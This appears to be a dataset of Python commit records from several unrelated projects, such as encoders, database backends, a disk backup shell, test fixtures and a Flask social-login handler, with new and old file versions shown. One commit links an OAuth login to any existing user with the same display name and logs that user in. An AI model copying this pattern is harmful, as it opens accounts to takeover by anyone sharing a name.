yaml.safe_dump(obj, default_flow_style=(not pretty))
SUPPORTED_ENCODERS.update({
'yaml': {
'headers': (("Content-Type", "text/yaml; charset=UTF-8"),),
'encoder': yaml_encode
}
})
try:
try:
import msgpack
except ImportError:
import umsgpack as msgpack
except ImportError:
pass
else:
def msgpack_encode(obj, pretty=False):
return msgpack.dumps(obj)
SUPPORTED_ENCODERS.update({
'msgpack': {
'headers': (("Content-Type", "application/msgpack; charset=UTF-8"),),
'encoder': msgpack_encode
}
})
| # Copyright (C) 2015 SlimRoms Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
SUPPORTED_ENCODERS = {}
import json
def json_encode(obj, pretty=False):
kwargs = {}
if pretty:
kwargs['indent'] = 4
kwargs['separators'] = (',', ': ')
return json.dumps(obj, **kwargs).replace("</", "<\\/")
SUPPORTED_ENCODERS.update({
'json': {
'headers': (("Content-Type", "application/json; charset=UTF-8"),),
'encoder': json_encode
}
})
try:
import xmltodict
except ImportError:
pass
else:
def xml_encode(obj, pretty=False):
if len(obj) == 1:
obj = {'root': obj}
return xmltodict.unparse(obj, pretty=pretty)
SUPPORTED_ENCODERS.update({
'xml': {
'headers': (("Content-Type", "application/xml; charset=UTF-8"),),
'encoder': xml_encode
}
})
try:
import yaml
except ImportError:
pass
else:
def yaml_encode(obj, pretty=False):
yaml.safe_dump(obj, default_flow_style=(not pretty))
SUPPORTED_ENCODERS.update({
'yaml': {
'headers': (("Content-Type", "text/yaml; charset=UTF-8"),),
'encoder': yaml_encode
}
})
| Python | 0 |
745d3fae6b6055c731a47c13ef77e1faf1a4b7e5 | upgrade elasticsearch mining backends | mining/db/backends/melasticsearch.py | mining/db/backends/melasticsearch.py | # -*- coding: utf-8 -*-
import json
import requests
from elasticsearch import Elasticsearch as ES
from mining.utils.listc import listc_dict
class Elasticsearch(object):
def conn(self):
"""Open connection on Elasticsearch DataBase"""
conn = ES([
{"host": self.conf.get('host'),
"port": self.conf.get('port')}
])
return conn
def save(self, house, data, content_type='dict'):
"""Save meta dada on Elasticsearch"""
requests.delete("http://{}:{}/{}".format(
self.conf.get('host'), self.conf.get('port'), house))
for obj in data.get('data'):
self.conn().index(index=house,
doc_type='data'.format(house),
body=obj)
self.conn().index(index=house,
doc_type='columns',
body={"columns": data.get('columns')})
return self.conn()
def get(self, house, content_type="dict", callback={}):
"""Get meta data on Elasticsearch"""
count = self.conn().count(index=house, doc_type="data").get('count')
doc_data = self.conn().search(index=house, doc_type='data',
body=self.filter(), size=count)
data = {}
"""
data['data'] = [obj.get("_source")
for obj in doc_data.get('hits').get('hits')]
"""
data['data'] = listc_dict(doc_data.get('hits').get('hits'), "_source")
doc_columns = self.conn().search(index=house, doc_type='columns',
body=self.filter())
data.update(doc_columns.get('hits').get('hits')[0].get('_source'))
data['count'] = count
return data
def filter(self):
"""Generate dict to applay filter on Elasticsearch"""
filter = {
"query": {
"bool": {
"should": [
{ "match": { "country": "Brazil"}},
{ "match": { "full_name": "Daniel Austin"}}
]
}
}
}
filter = {"query": {"match_all" : {}}}
return filter
| # -*- coding: utf-8 -*-
import json
from elasticsearch import Elasticsearch as ES
class Elasticsearch(object):
def conn(self):
"""Open connection on Elasticsearch DataBase"""
conn = ES([
{"host": self.conf.get('host'),
"port": self.conf.get('port'),
"url_prefix": self.conf.get('db')}
])
return conn
def save(self, house, data, content_type=None):
"""Save meta dada on Elasticsearch"""
if content_type == "application/json":
data = json.dumps(data)
return self.conn().index(index=house, doc_type='json', id=1,
body=data)
def get(self, house, content_type="application/json", callback={}):
"""Get meta data on Elasticsearch"""
data = self.conn().get(index=house, doc_type='json', id=1) or callback
if content_type == "application/json":
return json.loads(data['_source'])
return data['_source']
| Python | 0 |
136a47e74f6c7e10c05286bc12048b41b7e2f580 | Add a simple command shell for running backup and restore | corvus/console.py | corvus/console.py | import asyncore
import cmd
import shlex
import sys
import time
from corvus.client import Corvus
class Console(cmd.Cmd):
def __init__(self, completekey='tab', stdin=None, stdout=None,
corvus=None):
if corvus is None:
corvus = Corvus()
self._corvus = corvus
self.prompt = "> "
cmd.Cmd.__init__(self, completekey, stdin, stdout)
def help_backup(self):
self.stdout.write('backup <drive> <filename>\n'
'Read all sectors and save to an image file\n')
def do_backup(self, args):
splitted = shlex.split(args)
if len(splitted) != 2:
return self.help_backup()
drive = int(splitted[0])
filename = splitted[1]
total_sectors = self._corvus.get_drive_capacity(drive)
with open(filename, "wb") as f:
for i in range(total_sectors):
data = self._corvus.read_sector_512(drive, i)
f.write(''.join([ chr(d) for d in data ]))
self.stdout.write("\r%d bytes" % (i * 512))
self.stdout.flush()
self.stdout.write("\n")
def help_restore(self):
self.stdout.write('restore <drive> <filename>\n'
'Write all sectors from an image file\n')
def do_restore(self, args):
splitted = shlex.split(args)
if len(splitted) != 2:
return self.help_restore()
drive = int(splitted[0])
filename = splitted[1]
total_sectors = self._corvus.get_drive_capacity(drive)
with open(filename, "rb") as f:
for i in range(total_sectors):
data = [ ord(d) for d in f.read(512) ]
if len(data) < 512:
break
self._corvus.write_sector_512(1, i, data)
self.stdout.write("\r%d bytes" % (i * 512))
self.stdout.flush()
self.stdout.write("\n")
def help_scribble(self):
self.stdout.write('scribble <drive> <count>\n'
'Seek to first and last sector <count> times.\n')
def do_scribble(self, args):
splitted = shlex.split(args)
if len(splitted) != 2:
return self.help_scribble()
drive = int(splitted[0])
count = int(splitted[1])
# corvus, count
first_sector = 0
last_sector = self._corvus.get_drive_capacity(1) - 1
for i in range(count):
self._corvus.read_sector_512(drive, first_sector)
time.sleep(0.10)
self._corvus.read_sector_512(drive, last_sector)
time.sleep(0.10)
def help_quit(self):
self._output("Exit this program")
def do_quit(self, args):
return 1
def main():
c = Console()
c.do_help('')
c.cmdloop()
if __name__ == "__main__":
main()
| import sys
import time
from corvus.client import Corvus
def backup(corvus, filename):
total_sectors = corvus.get_drive_capacity(1)
with open(filename, "wb") as f:
for i in range(total_sectors):
data = corvus.read_sector_512(1, i)
f.write(''.join([ chr(d) for d in data ]))
sys.stdout.write("\r%d bytes" % (i * 512))
sys.stdout.flush()
sys.stdout.write("\n")
def restore(corvus, filename):
total_sectors = corvus.get_drive_capacity(1)
with open(filename, "rb") as f:
for i in range(total_sectors):
data = [ ord(d) for d in f.read(512) ]
if len(data) < 512:
break
corvus.write_sector_512(1, i, data)
sys.stdout.write("\r%d bytes" % (i * 512))
sys.stdout.flush()
sys.stdout.write("\n")
def scribble(corvus, count):
first_sector = 0
last_sector = corvus.get_drive_capacity(1) - 1
for i in range(count):
corvus.read_sector_512(1, first_sector)
time.sleep(0.10)
corvus.read_sector_512(1, last_sector)
time.sleep(0.10)
def main():
corvus = Corvus()
corvus.init_drive()
backup(corvus, "image.bin")
if __name__ == "__main__":
main()
| Python | 0 |
bc1e350dd19d91932bbfff73f863129ac94273c9 | bump version to 2.0.1 | torment/information.py | torment/information.py | # Copyright 2015 Alex Brandt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
AUTHOR = 'Alex Brandt'
AUTHOR_EMAIL = 'alunduil@alunduil.com'
COPYRIGHT = '2015'
DESCRIPTION = 'A Study in Fixture Based Testing Frameworking'
LICENSE = 'Apache-2.0'
NAME = 'torment'
URL = 'https://github.com/kumoru/torment'
VERSION = '2.0.1'
| # Copyright 2015 Alex Brandt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
AUTHOR = 'Alex Brandt'
AUTHOR_EMAIL = 'alunduil@alunduil.com'
COPYRIGHT = '2015'
DESCRIPTION = 'A Study in Fixture Based Testing Frameworking'
LICENSE = 'Apache-2.0'
NAME = 'torment'
URL = 'https://github.com/kumoru/torment'
VERSION = '2.0.0'
| Python | 0 |
90ad8e104c339b923d9291916647391572fbced1 | Bump version number | nassl/__init__.py | nassl/__init__.py | # -*- coding: utf-8 -*-
__author__ = 'Alban Diquet'
__version__ = '0.16.0'
| # -*- coding: utf-8 -*-
__author__ = 'Alban Diquet'
__version__ = '0.15.1'
| Python | 0.000002 |
e51786c46ad4eb7310b1eaa0153253116f2c01bc | Update test bids | openprocurement/tender/esco/tests/base.py | openprocurement/tender/esco/tests/base.py | # -*- coding: utf-8 -*-
import os
from copy import deepcopy
from openprocurement.tender.openeu.tests.base import (
BaseTenderWebTest,
test_features_tender_data as base_eu_test_features_data,
test_tender_data as base_eu_test_data,
test_lots as base_eu_lots,
test_bids as base_eu_bids,
)
test_tender_data = deepcopy(base_eu_test_data)
test_tender_data['procurementMethodType'] = "esco.EU"
test_tender_data['NBUdiscountRate'] = 0.22
test_tender_data['minValue'] = test_tender_data['value']
del test_tender_data['value']
test_features_tender_data = deepcopy(base_eu_test_features_data)
test_features_tender_data['procurementMethodType'] = "esco.EU"
test_features_tender_data['NBUdiscountRate'] = 0.22
test_features_tender_data['minValue'] = test_features_tender_data['value']
del test_features_tender_data['value']
test_lots = deepcopy(base_eu_lots)
test_lots[0]['minValue'] = test_lots[0]['value']
del test_lots[0]['value']
test_bids = deepcopy(base_eu_bids)
for bid in test_bids:
bid['value'] = {'yearlyPayments': 0.9,
'annualCostsReduction': 751.5,
'contractDuration': 10}
class BaseESCOWebTest(BaseTenderWebTest):
relative_to = os.path.dirname(__file__)
initial_data = None
initial_status = None
initial_bids = None
initial_lots = None
initial_auth = ('Basic', ('broker', ''))
docservice = False
class BaseESCOContentWebTest(BaseESCOWebTest):
""" ESCO Content Test """
initialize_initial_data = True
def setUp(self):
super(BaseESCOContentWebTest, self).setUp()
if self.initial_data and self.initialize_initial_data:
self.create_tender()
class BaseESCOEUContentWebTest(BaseESCOContentWebTest):
""" ESCO EU Content Test """
initial_data = test_tender_data
| # -*- coding: utf-8 -*-
import os
from copy import deepcopy
from openprocurement.tender.openeu.tests.base import (
BaseTenderWebTest,
test_features_tender_data as base_eu_test_features_data,
test_tender_data as base_eu_test_data,
test_lots as base_eu_lots,
test_bids as base_eu_bids,
)
test_tender_data = deepcopy(base_eu_test_data)
test_tender_data['procurementMethodType'] = "esco.EU"
test_tender_data['NBUdiscountRate'] = 0.22
test_tender_data['minValue'] = test_tender_data['value']
del test_tender_data['value']
test_features_tender_data = deepcopy(base_eu_test_features_data)
test_features_tender_data['procurementMethodType'] = "esco.EU"
test_features_tender_data['NBUdiscountRate'] = 0.22
test_features_tender_data['minValue'] = test_features_tender_data['value']
del test_features_tender_data['value']
test_lots = deepcopy(base_eu_lots)
test_lots[0]['minValue'] = test_lots[0]['value']
del test_lots[0]['value']
test_bids = deepcopy(base_eu_bids)
test_bids[0]['value'] = {'yearlyPayments': 0.9,
'annualCostsReduction': 751.5,
'contractDuration': 10}
class BaseESCOWebTest(BaseTenderWebTest):
relative_to = os.path.dirname(__file__)
initial_data = None
initial_status = None
initial_bids = None
initial_lots = None
initial_auth = ('Basic', ('broker', ''))
docservice = False
class BaseESCOContentWebTest(BaseESCOWebTest):
""" ESCO Content Test """
initialize_initial_data = True
def setUp(self):
super(BaseESCOContentWebTest, self).setUp()
if self.initial_data and self.initialize_initial_data:
self.create_tender()
class BaseESCOEUContentWebTest(BaseESCOContentWebTest):
""" ESCO EU Content Test """
initial_data = test_tender_data
| Python | 0 |
7a8e5d15d7d9681b8d5ddae4d72e64b5ca6cba13 | remove disabled code | dyndnsc/updater/base.py | dyndnsc/updater/base.py | # -*- coding: utf-8 -*-
import logging
import requests
from ..common.subject import Subject
from ..common.events import IP_UPDATE_SUCCESS, IP_UPDATE_ERROR
log = logging.getLogger(__name__)
class UpdateProtocol(Subject):
"""the base class for all update protocols"""
_updateurl = None
theip = None
hostname = None # this holds the desired dns hostname
status = 0
nochgcount = 0
failcount = 0
def __init__(self):
self.updateurl = self._updateurl
super(UpdateProtocol, self).__init__()
def updateUrl(self):
return self.updateurl
def success(self):
self.status = 0
self.failcount = 0
self.nochgcount = 0
self.notify_observers(IP_UPDATE_SUCCESS, "Updated IP address of '%s' to %s" % (self.hostname, self.theip))
def abuse(self):
self.status = 1
self.failcount = 0
self.nochgcount = 0
self.notify_observers(IP_UPDATE_ERROR, "This client is considered to be abusive for hostname '%s'" % (self.hostname))
def nochg(self):
self.status = 0
self.failcount = 0
self.nochgcount += 1
def nohost(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "Invalid/non-existant hostname: [%s]" % (self.hostname))
def failure(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "Service is failing")
def notfqdn(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "The provided hostname '%s' is not a valid hostname!" % (self.hostname))
def protocol(self):
params = {'myip': self.theip, 'hostname': self.hostname}
r = requests.get(self.updateUrl(), params=params, auth=(self.userid, self.password), timeout=60)
r.close()
log.debug("status %i, %s", r.status_code, r.text)
if r.status_code == 200:
if r.text.startswith("good "):
self.success()
return self.theip
elif r.text.startswith('nochg'):
self.nochg()
return self.theip
elif r.text == 'nohost':
self.nohost()
return 'nohost'
elif r.text == 'abuse':
self.abuse()
return 'abuse'
elif r.text == '911':
self.failure()
return '911'
elif r.text == 'notfqdn':
self.notfqdn()
return 'notfqdn'
else:
self.status = 1
self.notify_observers(IP_UPDATE_ERROR, "Problem updating IP address of '%s' to %s: %s" % (self.hostname, self.theip, r.text))
return r.text
else:
self.status = 1
self.notify_observers(IP_UPDATE_ERROR, "Problem updating IP address of '%s' to %s: %s" % (self.hostname, self.theip, r.status_code))
return 'invalid http status code: %s' % r.status_code
| # -*- coding: utf-8 -*-
import logging
import requests
from ..common.subject import Subject
from ..common.events import IP_UPDATE_SUCCESS, IP_UPDATE_ERROR
log = logging.getLogger(__name__)
class UpdateProtocol(Subject):
"""the base class for all update protocols"""
_updateurl = None
theip = None
hostname = None # this holds the desired dns hostname
status = 0
nochgcount = 0
failcount = 0
def __init__(self):
self.updateurl = self._updateurl
super(UpdateProtocol, self).__init__()
observers = []
# TODO: auto detect all notifiers
# TODO: make this configurable?
if False:
from ..notifications import osxnotificationcenter
if osxnotificationcenter.is_available():
observers.append(osxnotificationcenter.create_notify_handler())
from ..notifications import growl
if growl.is_available():
observers.append(growl.create_notify_handler())
for observer in observers:
self.register_observer(observer, (IP_UPDATE_SUCCESS, IP_UPDATE_ERROR))
def updateUrl(self):
return self.updateurl
def success(self):
self.status = 0
self.failcount = 0
self.nochgcount = 0
self.notify_observers(IP_UPDATE_SUCCESS, "Updated IP address of '%s' to %s" % (self.hostname, self.theip))
def abuse(self):
self.status = 1
self.failcount = 0
self.nochgcount = 0
self.notify_observers(IP_UPDATE_ERROR, "This client is considered to be abusive for hostname '%s'" % (self.hostname))
def nochg(self):
self.status = 0
self.failcount = 0
self.nochgcount += 1
def nohost(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "Invalid/non-existant hostname: [%s]" % (self.hostname))
def failure(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "Service is failing")
def notfqdn(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "The provided hostname '%s' is not a valid hostname!" % (self.hostname))
def protocol(self):
params = {'myip': self.theip, 'hostname': self.hostname}
r = requests.get(self.updateUrl(), params=params, auth=(self.userid, self.password), timeout=60)
r.close()
log.debug("status %i, %s", r.status_code, r.text)
if r.status_code == 200:
if r.text.startswith("good "):
self.success()
return self.theip
elif r.text.startswith('nochg'):
self.nochg()
return self.theip
elif r.text == 'nohost':
self.nohost()
return 'nohost'
elif r.text == 'abuse':
self.abuse()
return 'abuse'
elif r.text == '911':
self.failure()
return '911'
elif r.text == 'notfqdn':
self.notfqdn()
return 'notfqdn'
else:
self.status = 1
self.notify_observers(IP_UPDATE_ERROR, "Problem updating IP address of '%s' to %s: %s" % (self.hostname, self.theip, r.text))
return r.text
else:
self.status = 1
self.notify_observers(IP_UPDATE_ERROR, "Problem updating IP address of '%s' to %s: %s" % (self.hostname, self.theip, r.status_code))
return 'invalid http status code: %s' % r.status_code
| Python | 0 |
6c15caa37c3635fc1ca65a0d2989a271bc5723fe | Update amalgamation.py | nnvm/amalgamation/amalgamation.py | nnvm/amalgamation/amalgamation.py | import sys
import os.path, re, StringIO
blacklist = [
'Windows.h',
'mach/clock.h', 'mach/mach.h',
'malloc.h',
'glog/logging.h', 'io/azure_filesys.h', 'io/hdfs_filesys.h', 'io/s3_filesys.h',
'sys/stat.h', 'sys/types.h',
'omp.h', 'execinfo.h', 'packet/sse-inl.h'
]
def get_sources(def_file):
sources = []
files = []
visited = set()
mxnet_path = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
for line in open(def_file):
files = files + line.strip().split(' ')
for f in files:
f = f.strip()
if not f or f.endswith('.o:') or f == '\\': continue
fn = os.path.relpath(f)
if os.path.abspath(f).startswith(mxnet_path) and fn not in visited:
sources.append(fn)
visited.add(fn)
return sources
sources = get_sources(sys.argv[1])
def find_source(name, start):
candidates = []
for x in sources:
if x == name or x.endswith('/' + name): candidates.append(x)
if not candidates: return ''
if len(candidates) == 1: return candidates[0]
for x in candidates:
if x.split('/')[1] == start.split('/')[1]: return x
return ''
re1 = re.compile('<([./a-zA-Z0-9_-]*)>')
re2 = re.compile('"([./a-zA-Z0-9_-]*)"')
sysheaders = []
history = set([])
out = StringIO.StringIO()
def expand(x, pending):
if x in history and x not in ['mshadow/mshadow/expr_scalar-inl.h']: # MULTIPLE includes
return
if x in pending:
#print 'loop found: %s in ' % x, pending
return
print >>out, "//===== EXPANDING: %s =====\n" %x
for line in open(x):
if line.find('#include') < 0:
out.write(line)
continue
if line.strip().find('#include') > 0:
print line
continue
m = re1.search(line)
if not m: m = re2.search(line)
if not m:
print line + ' not found'
continue
h = m.groups()[0].strip('./')
source = find_source(h, x)
if not source:
if (h not in blacklist and
h not in sysheaders and
'mkl' not in h and
'nnpack' not in h): sysheaders.append(h)
else:
expand(source, pending + [x])
print >>out, "//===== EXPANDED: %s =====\n" %x
history.add(x)
expand(sys.argv[2], [])
f = open(sys.argv[3], 'wb')
for k in sorted(sysheaders):
print >>f, "#include <%s>" % k
print >>f, ''
print >>f, out.getvalue()
for x in sources:
if x not in history and not x.endswith('.o'):
print 'Not processed:', x
| import sys
import os.path, re, StringIO
blacklist = [
'Windows.h',
'mach/clock.h', 'mach/mach.h',
'malloc.h',
'glog/logging.h', 'io/azure_filesys.h', 'io/hdfs_filesys.h', 'io/s3_filesys.h',
'sys/stat.h', 'sys/types.h',
'omp.h'
]
def get_sources(def_file):
sources = []
files = []
visited = set()
mxnet_path = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
for line in open(def_file):
files = files + line.strip().split(' ')
for f in files:
f = f.strip()
if not f or f.endswith('.o:') or f == '\\': continue
fn = os.path.relpath(f)
if os.path.abspath(f).startswith(mxnet_path) and fn not in visited:
sources.append(fn)
visited.add(fn)
return sources
sources = get_sources(sys.argv[1])
def find_source(name, start):
candidates = []
for x in sources:
if x == name or x.endswith('/' + name): candidates.append(x)
if not candidates: return ''
if len(candidates) == 1: return candidates[0]
for x in candidates:
if x.split('/')[1] == start.split('/')[1]: return x
return ''
re1 = re.compile('<([./a-zA-Z0-9_-]*)>')
re2 = re.compile('"([./a-zA-Z0-9_-]*)"')
sysheaders = []
history = set([])
out = StringIO.StringIO()
def expand(x, pending):
if x in history and x not in ['mshadow/mshadow/expr_scalar-inl.h']: # MULTIPLE includes
return
if x in pending:
#print 'loop found: %s in ' % x, pending
return
print >>out, "//===== EXPANDING: %s =====\n" %x
for line in open(x):
if line.find('#include') < 0:
out.write(line)
continue
if line.strip().find('#include') > 0:
print line
continue
m = re1.search(line)
if not m: m = re2.search(line)
if not m:
print line + ' not found'
continue
h = m.groups()[0].strip('./')
source = find_source(h, x)
if not source:
if (h not in blacklist and
h not in sysheaders and
'mkl' not in h and
'nnpack' not in h): sysheaders.append(h)
else:
expand(source, pending + [x])
print >>out, "//===== EXPANDED: %s =====\n" %x
history.add(x)
expand(sys.argv[2], [])
f = open(sys.argv[3], 'wb')
for k in sorted(sysheaders):
print >>f, "#include <%s>" % k
print >>f, ''
print >>f, out.getvalue()
for x in sources:
if x not in history and not x.endswith('.o'):
print 'Not processed:', x
| Python | 0.000001 |
7fabbbb6562f068690b7971c6ea1299172400d73 | fix `make run_importer_jobs` | labonneboite/importer/conf/development.py | labonneboite/importer/conf/development.py | # --- job 1/8 & 2/8 : check_etablissements & extract_etablissements
DISTINCT_DEPARTEMENTS_HAVING_OFFICES = 15
# --- job 5/8 : compute_scores
MINIMUM_OFFICES_REQUIRED_TO_TRAIN_MODEL = 0
RMSE_MAX = 20000
MAXIMUM_COMPUTE_SCORE_JOB_FAILURES = 94 # 96 departements == 2 successes + 94 failures
# --- job 6/8 : validate_scores
SCORE_REDUCING_MINIMUM_THRESHOLD = 0
DEPARTEMENTS_TO_BE_SANITY_CHECKED = ['14', '69']
| # --- job 1/8 & 2/8 : check_etablissements & extract_etablissements
DISTINCT_DEPARTEMENTS_HAVING_OFFICES = 15
# --- job 5/8 : compute_scores
MINIMUM_OFFICES_REQUIRED_TO_TRAIN_MODEL = 0
RMSE_MAX = 5000
MAXIMUM_COMPUTE_SCORE_JOB_FAILURES = 94 # 96 departements == 2 successes + 94 failures
# --- job 6/8 : validate_scores
SCORE_REDUCING_MINIMUM_THRESHOLD = 0
DEPARTEMENTS_TO_BE_SANITY_CHECKED = ['14', '69']
| Python | 0 |
51129edea0a10a5799f329443b196e930a591fb9 | Move down timezone module. | laundryapp/templatetags/laundryapptags.py | laundryapp/templatetags/laundryapptags.py | from schedule.conf.settings import CHECK_EVENT_PERM_FUNC, CHECK_CALENDAR_PERM_FUNC
from schedule.templatetags.scheduletags import querystring_for_date
from django.conf import settings
from django import template
from django.core.urlresolvers import reverse
from django.utils.safestring import mark_safe
from schedule.conf.settings import SCHEDULER_PREVNEXT_LIMIT_SECONDS
register = template.Library()
from django.utils import timezone
from pytz import timezone
import datetime
import sys
@register.inclusion_tag("schedule/_daily_table.html", takes_context=True)
def laundryapp_daily_table(context, day, start=6, end=23, increment=60):
user = context['request'].user
addable = CHECK_EVENT_PERM_FUNC(None, user)
if 'calendar' in context:
addable &= CHECK_CALENDAR_PERM_FUNC(context['calendar'], user)
context['addable'] = addable
day_part = day.get_time_slot(day.start + datetime.timedelta(hours=start), day.start + datetime.timedelta(hours=end))
# get slots to display on the left
slots = _cook_slots(day_part, increment)
context['slots'] = slots
return context
def _cook_slots(period, increment):
"""
Prepare slots to be displayed on the left hand side
calculate dimensions (in px) for each slot.
Arguments:
period - time period for the whole series
increment - slot size in minutes
"""
tdiff = datetime.timedelta(minutes=increment)
num = int((period.end - period.start).total_seconds()) // int(tdiff.total_seconds())
s = period.start
slots = []
for i in range(num):
sl = period.get_time_slot(s, s + tdiff)
slots.append(sl)
s = s + tdiff
return slots
@register.inclusion_tag("schedule/_create_event_options.html", takes_context=True)
def laundryapp_create_event_url(context, calendar, slot):
print >> sys.stderr, "In laundryapp templatetags!"
context.update({
'calendar': calendar,
'MEDIA_URL': getattr(settings, "MEDIA_URL"),
})
lookup_context = {
'calendar_slug': calendar.slug,
}
settings_timezone = timezone(settings.TIME_ZONE)
slot = slot.astimezone(settings_timezone)
context['laundryapp_create_event_url'] = "%s%s" % (
reverse("calendar_create_event", kwargs=lookup_context),
querystring_for_date(slot))
return context
@register.simple_tag
def prev_url(target, calendar, period):
now = timezone.now()
delta = now - period.prev().start
slug = calendar.slug
if delta.total_seconds() > SCHEDULER_PREVNEXT_LIMIT_SECONDS:
return ''
return mark_safe('<a href="%s%s" class="btn btn-default btn-lg"><span class="glyphicon glyphicon-circle-arrow-left"></span></a>' % (
reverse(target, kwargs=dict(calendar_slug=slug)),
querystring_for_date(period.prev().start)))
@register.simple_tag
def next_url(target, calendar, period):
now = timezone.now()
slug = calendar.slug
delta = period.next().start - now
if delta.total_seconds() > SCHEDULER_PREVNEXT_LIMIT_SECONDS:
return ''
return mark_safe('<a href="%s%s" class="btn btn-default btn-lg"><span class="glyphicon glyphicon-circle-arrow-right"></span></a>' % (
reverse(target, kwargs=dict(calendar_slug=slug)),
querystring_for_date(period.next().start)))
| from schedule.conf.settings import CHECK_EVENT_PERM_FUNC, CHECK_CALENDAR_PERM_FUNC
from schedule.templatetags.scheduletags import querystring_for_date
from django.conf import settings
from django import template
from django.core.urlresolvers import reverse
from django.utils import timezone
from django.utils.safestring import mark_safe
from schedule.conf.settings import SCHEDULER_PREVNEXT_LIMIT_SECONDS
register = template.Library()
from pytz import timezone
import datetime
import sys
@register.inclusion_tag("schedule/_daily_table.html", takes_context=True)
def laundryapp_daily_table(context, day, start=6, end=23, increment=60):
user = context['request'].user
addable = CHECK_EVENT_PERM_FUNC(None, user)
if 'calendar' in context:
addable &= CHECK_CALENDAR_PERM_FUNC(context['calendar'], user)
context['addable'] = addable
day_part = day.get_time_slot(day.start + datetime.timedelta(hours=start), day.start + datetime.timedelta(hours=end))
# get slots to display on the left
slots = _cook_slots(day_part, increment)
context['slots'] = slots
return context
def _cook_slots(period, increment):
"""
Prepare slots to be displayed on the left hand side
calculate dimensions (in px) for each slot.
Arguments:
period - time period for the whole series
increment - slot size in minutes
"""
tdiff = datetime.timedelta(minutes=increment)
num = int((period.end - period.start).total_seconds()) // int(tdiff.total_seconds())
s = period.start
slots = []
for i in range(num):
sl = period.get_time_slot(s, s + tdiff)
slots.append(sl)
s = s + tdiff
return slots
@register.inclusion_tag("schedule/_create_event_options.html", takes_context=True)
def laundryapp_create_event_url(context, calendar, slot):
print >> sys.stderr, "In laundryapp templatetags!"
context.update({
'calendar': calendar,
'MEDIA_URL': getattr(settings, "MEDIA_URL"),
})
lookup_context = {
'calendar_slug': calendar.slug,
}
settings_timezone = timezone(settings.TIME_ZONE)
slot = slot.astimezone(settings_timezone)
context['laundryapp_create_event_url'] = "%s%s" % (
reverse("calendar_create_event", kwargs=lookup_context),
querystring_for_date(slot))
return context
@register.simple_tag
def prev_url(target, calendar, period):
now = timezone.now()
delta = now - period.prev().start
slug = calendar.slug
if delta.total_seconds() > SCHEDULER_PREVNEXT_LIMIT_SECONDS:
return ''
return mark_safe('<a href="%s%s" class="btn btn-default btn-lg"><span class="glyphicon glyphicon-circle-arrow-left"></span></a>' % (
reverse(target, kwargs=dict(calendar_slug=slug)),
querystring_for_date(period.prev().start)))
@register.simple_tag
def next_url(target, calendar, period):
now = timezone.now()
slug = calendar.slug
delta = period.next().start - now
if delta.total_seconds() > SCHEDULER_PREVNEXT_LIMIT_SECONDS:
return ''
return mark_safe('<a href="%s%s" class="btn btn-default btn-lg"><span class="glyphicon glyphicon-circle-arrow-right"></span></a>' % (
reverse(target, kwargs=dict(calendar_slug=slug)),
querystring_for_date(period.next().start)))
| Python | 0 |
3cefa75b8e9012d828453a764c0b169ab169fae6 | fix google login names; associate with any user with same name | chip_friends/security.py | chip_friends/security.py | from __future__ import unicode_literals
import random
import string
from flask import render_template
from flask_security import Security, PeeweeUserDatastore
from flask_social import Social
from flask_social.datastore import PeeweeConnectionDatastore
from flask_social.utils import get_connection_values_from_oauth_response
from flask_social.views import connect_handler, login_user, login_failed
from .app import app, db
from .models import Role, User, UserRoles, Connection
user_datastore = PeeweeUserDatastore(db, User, Role, UserRoles)
app.security = Security(app, user_datastore)
app.social = Social(app, PeeweeConnectionDatastore(db, Connection))
@login_failed.connect_via(app)
def on_login_failed(sender, provider, oauth_response):
connection_values = get_connection_values_from_oauth_response(
provider, oauth_response)
name = connection_values['full_name']
if isinstance(name, dict):
try:
name = '{} {}'.format(name['givenName'], name['familyName'])
except (ValueError, KeyError):
pass
password = ''.join(random.choice(string.ascii_letters) for _ in range(20))
user, new = User.get_or_create(
name=name, defaults={'email': '', 'password': password})
# don't bother using the datastore, just use the model
connection_values['user_id'] = user.id
connect_handler(connection_values, provider)
login_user(user)
db.commit()
return render_template('index.html')
| import random
import string
from flask import render_template
from flask_security import Security, PeeweeUserDatastore
from flask_social import Social
from flask_social.datastore import PeeweeConnectionDatastore
from flask_social.utils import get_connection_values_from_oauth_response
from flask_social.views import connect_handler, login_user, login_failed
from .app import app, db
from .models import Role, User, UserRoles, Connection
user_datastore = PeeweeUserDatastore(db, User, Role, UserRoles)
app.security = Security(app, user_datastore)
app.social = Social(app, PeeweeConnectionDatastore(db, Connection))
@login_failed.connect_via(app)
def on_login_failed(sender, provider, oauth_response):
connection_values = get_connection_values_from_oauth_response(
provider, oauth_response)
ds = app.security.datastore
password = ''.join(random.choice(string.ascii_letters) for _ in range(20))
user = ds.create_user(
email='', password=password, name=connection_values['full_name'])
ds.commit()
connection_values['user_id'] = user.id
connect_handler(connection_values, provider)
login_user(user)
db.commit()
return render_template('index.html')
| Python | 0 |
